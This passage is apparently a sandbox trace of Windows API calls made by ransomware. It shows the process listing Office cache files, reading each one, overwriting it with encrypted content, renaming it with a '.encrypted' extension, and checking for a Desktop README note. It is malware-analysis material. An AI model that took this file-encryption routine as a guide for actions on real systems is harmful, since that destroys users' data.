lpBuffer=0x2300950*, lpNumberOfBytesRead=0x2ee7d4*=0xa40, lpOverlapped=0x0) returned 1 [0232.389] CloseHandle (hObject=0x280) returned 1 [0232.414] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0232.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0232.414] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0232.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0232.414] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0232.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0232.415] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.416] GetFileType (hFile=0x280) returned 0x1 [0232.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0232.416] GetFileType (hFile=0x280) returned 0x1 [0232.416] WriteFile (in: hFile=0x280, lpBuffer=0x2351cf4*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x2351cf4*, lpNumberOfBytesWritten=0x2ee798*=0xa50, lpOverlapped=0x0) returned 1 [0232.417] CloseHandle (hObject=0x280) returned 1 [0232.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0232.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0232.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0232.418] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x7011b5a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xa50)) returned 1 [0232.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0232.418] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0232.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0232.420] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpFilePart=0x0) returned 0x4b [0232.420] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpFilePart=0x0) returned 0x4c [0232.420] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f1330 [0232.432] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.432] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0232.432] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0232.432] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0232.433] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0232.433] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0232.433] FindClose (in: hFindFile=0x94f1330 | out: hFindFile=0x94f1330) returned 1 [0232.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0232.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0232.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0232.434] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpFilePart=0x0) returned 0x4b [0232.434] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpFilePart=0x0) returned 0x4c [0232.434] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f1330 [0232.436] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.436] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0232.436] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0232.436] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0232.437] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0232.437] FindNextFileW (in: hFindFile=0x94f1330, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 0 [0232.437] FindClose (in: hFindFile=0x94f1330 | out: hFindFile=0x94f1330) returned 1 [0232.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0232.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0232.438] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0232.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0232.438] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.442] GetFileType (hFile=0x280) returned 0x1 [0232.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0232.442] GetFileType (hFile=0x280) returned 0x1 [0232.442] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0x545 [0232.442] ReadFile (in: hFile=0x280, lpBuffer=0x2355c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x2355c98*, lpNumberOfBytesRead=0x2ee794*=0x545, lpOverlapped=0x0) returned 1 [0232.444] CloseHandle (hObject=0x280) returned 1 [0232.469] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0232.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0232.469] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0232.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0232.469] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0232.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0232.469] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.471] GetFileType (hFile=0x280) returned 0x1 [0232.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0232.471] GetFileType (hFile=0x280) returned 0x1 [0232.471] WriteFile (in: hFile=0x280, lpBuffer=0x23a5760*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2ee758, lpOverlapped=0x0 | out: lpBuffer=0x23a5760*, lpNumberOfBytesWritten=0x2ee758*=0x550, lpOverlapped=0x0) returned 1 [0232.472] CloseHandle (hObject=0x280) returned 1 [0232.473] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0232.473] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.encrypted", lpFilePart=0x0) returned 0x63 [0232.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0232.473] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x701b3b20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x550)) returned 1 [0232.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0232.473] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.encrypted")) returned 1 [0232.474] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpFilePart=0x0) returned 0x55 [0232.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0232.474] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0232.475] GetFileType (hFile=0x280) returned 0x1 [0232.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0232.475] GetFileType (hFile=0x280) returned 0x1 [0232.475] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0x1ab7e94 [0232.564] ReadFile (in: hFile=0x280, lpBuffer=0xd551018, nNumberOfBytesToRead=0x1ab7e94, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0xd551018*, lpNumberOfBytesRead=0x2ee794*=0x1ab7e94, lpOverlapped=0x0) returned 1 [0233.341] CloseHandle (hObject=0x280) returned 1 [0236.290] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0236.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0236.290] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0236.290] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpFilePart=0x0) returned 0x55 [0236.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0236.290] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0236.293] GetFileType (hFile=0x280) returned 0x1 [0236.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0236.294] GetFileType (hFile=0x280) returned 0x1 [0236.294] WriteFile (in: hFile=0x280, lpBuffer=0x17551018*, nNumberOfBytesToWrite=0x1ab7ea0, lpNumberOfBytesWritten=0x2ee784, lpOverlapped=0x0 | out: lpBuffer=0x17551018*, lpNumberOfBytesWritten=0x2ee784*=0x1ab7ea0, lpOverlapped=0x0) returned 1 [0237.108] CloseHandle (hObject=0x280) returned 1 [0237.109] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpFilePart=0x0) returned 0x55 [0237.109] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.encrypted", lpFilePart=0x0) returned 0x5f [0237.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0237.109] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x72de3380, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7ea0)) returned 1 [0237.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0237.109] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.encrypted" (normalized: "c:\\msocache\\all 